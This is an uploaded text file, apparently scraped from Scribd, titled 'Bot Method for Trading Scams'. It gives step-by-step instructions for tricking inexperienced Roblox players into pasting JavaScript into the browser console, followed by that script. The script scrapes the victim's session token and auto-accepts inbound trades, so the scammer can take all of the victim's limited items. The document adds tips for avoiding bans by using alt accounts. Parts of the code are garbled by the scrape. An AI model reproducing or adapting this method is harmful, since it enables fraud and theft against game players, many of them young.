0% found this document useful (0 votes)
275 views2 pages

Bot Method for Trading Scams

Uploaded by

chanhabib7
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
275 views2 pages

Bot Method for Trading Scams

Uploaded by

chanhabib7
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
  • Bot Method Overview
  • Code Implementation Details

BOT METHOD

---------------
Find someone who looks like a total noob. They have
If they catch on, better to just leave then try to convince them its legit.
Use an alt.
Don't transfer scammed items to your main account, I almost got banned for that.
Don't leak, I sold this method because I need some money. Don't give it away for
free.
READ THE WHOLE METHOD BEFORE YOU USE IT!

------------------------------------------------------------------------
Step 1: Find a Premium noob with limiteds.
Step 2: Party them or join their game
Step 3: Ask them if they want a Trade Currency bot and tell them it trades robux
back and forth to get free money.
Step 4: Once they agree, PM them the code below and say "Hit F12 in google chrome,
click console, and paste this in."
Step 5: They should tell you they are running it
Step 6: Send them a trade for all of their stuff for your item.
Step 7: The bot will auto accept it
Step 8: Make sure the trade went through, and leave game/chat.
-------------------------------------------------------------------------

I AM NOT RESPONSIBLE FOR ANY LOST ITEMS, BANS, SCAMMED ITEMS, OR ANYTHING RELATING
TO THIS METHOD.
ITS JUST A METHOD. ANYTHING THAT GOES WRONG IS NOT MY FAULT. USE AT YOUR OWN RISK.

-------------------------------------------
function POST(){
$.ajax({
url : "/My/[Link]/GetMyItemTrades",
type : "POST",
data : '{"statustype":"inbound","startindex":0}',
contentType : "application/json; charset=UTF-8",
success : function(Data){
var Base =
[Link]([Link](Data.d).Data[0])
var TradeId = Base["TradeSessionID"]
var Partner = Base["TradePartnerID"]
var Token = ""
$.get("/My/[Link]",function(Data){
Token = [Link](/setToken(\W(.+)\W);/)
[2].replace(/'/g,"")
Token = [Link]("+","%2B").replace("/","%2F")
}).always(function(){
$.post("/Trade/[Link]?token=" + Token,
{TradeID : TradeId,cmd : "pull"},function(Data){
var Base =
[Link]([Link]).AgentOfferList
var Other = 1
if (Number(Base[0].AgentID) ==
Number(Partner)){
Other = 0
}
var OtherVal = Base[Other]["OfferValue"]
var SelfVal = Base[Other == 0 && 1 || 0]
["OfferValue"]
var TradeJSON = [Link]
if (OtherVal/1 > SelfVal){
$.post("/Trade/[Link]?
token=" + Token,{TradeID : TradeId,TradeJSON:TradeJSON,cmd : "maketrade"})
}
POST()
})
})
}
})
}
POST()

You might also like